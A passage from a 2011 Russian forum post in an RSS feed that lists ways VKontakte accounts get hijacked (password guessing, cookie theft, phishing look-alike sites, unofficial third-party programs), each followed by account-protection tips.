						&lt;p&gt;2. Подбор пароля (вручную или с помощью брутфорса)&lt;br /&gt;Этот метод был популярен раньше, но после введения вконтакте каптчи (картинки с текстом, который нужно при вводе неверно пароля) стал менее актуальным.&lt;br /&gt;Однако, не редки случаи, когда пароль подбирается вашими знакомыми вручную.&lt;br /&gt;Составляйте сложные пароли.&lt;br /&gt;Длина пароля не должна быть меньше 6 символов. Лучше всего 8-10 символов. Не составляте пароль из даты своего рождения или номера телефона. Также не нужно составлять пароль из повторяющихся или последовательных цифр и символов. Используйте непредсказуемые пароли.&lt;br /&gt;В ПРОДОЛЖЕНИИ&lt;br /&gt;3. Взлом через cookie.&lt;br /&gt;Cookie - это файл на компьютере пользователя, в котором хранится его e-mail и зашифрованный пароль.&lt;br /&gt;Благодаря этим файлам Вам не приходится каждый раз при входе в контакт вводить пароль, ведь он сохранен в cookie.&lt;br /&gt;Если хакер получит этот файл cookie, то узнает ваш e-mail и пароль (правда в зашифрованном виде). Расшифровать пароль не сложно, если он короткий и простой, но если пароль составлен в соответствии с пунктом 2.&lt;br /&gt;Воруют cookie разными способами, но чтобы этого избежать, следуйте следующими советам:&lt;br /&gt;не вводите в строку браузера незнакомые скрипты;&lt;br /&gt;не устанавливайте никакие дополнения для вконтакте из сомнительных источников;&lt;br /&gt;не на каких сайтах не вставляйте значения своих cookies ни под каким предлогом;&lt;br /&gt;не оставляйте своих знакомых за вашим компьютером одних, если не доверяете им;&lt;/p&gt;
						&lt;p&gt;4. Взлом с помощью фейка.&lt;br /&gt;Очень часто в интернете встречаются сайты, которые по внешнему виду ничем не отличаются от контакта, и адрес этих сайтов очень похож на vkontakte.ru.&lt;br /&gt;Эти сайты не имеют никакого отношения к контакту, а созданы они только для того, чтобы невнимательные пользователи вводили туда свой e-mail и пароль.&lt;br /&gt;Будьте внимательны! Не вводите твой e-mail и пароль нигде, кроме как на сайте vkontakte.ru.&lt;/p&gt;
						&lt;p&gt;5. Взлом через “программы для контакта”.&lt;br /&gt;С развитием социальной сети вконтакте, появилось множество разных программ для нее. Но официальными продуктами контакта являются только тулбар (для Internet Explorer и Firefox) и виджет для Opera.&lt;br /&gt;Остальные программы могут быть небезопасны и могут использоваться их создателями для кражи пароля.&lt;br /&gt;Однако, разработчики этих программ утверждают, что никакого обмана тут нет - пароли не воруются. Верить им или нет - решать вам. На этом сайте я выкладываю только те программы для контакта, которые использую сам, и которым по крайней мере я доверяю.&lt;br /&gt;Администрация контакта не только не приветствует использование сторонних програм, но и запрещает это правилами.&lt;br /&gt;Поэтому использовать их или нет - каждый решает за себя.&lt;/p&gt;
						&lt;p&gt;Придерживайтесь этих советов, и будьте уверены в безопасности своего аккаунта.&lt;span style=&quot;color: red&quot;&gt;&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 17:11:18 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=3#p3</guid>
		</item>
	</channel>
</rss>
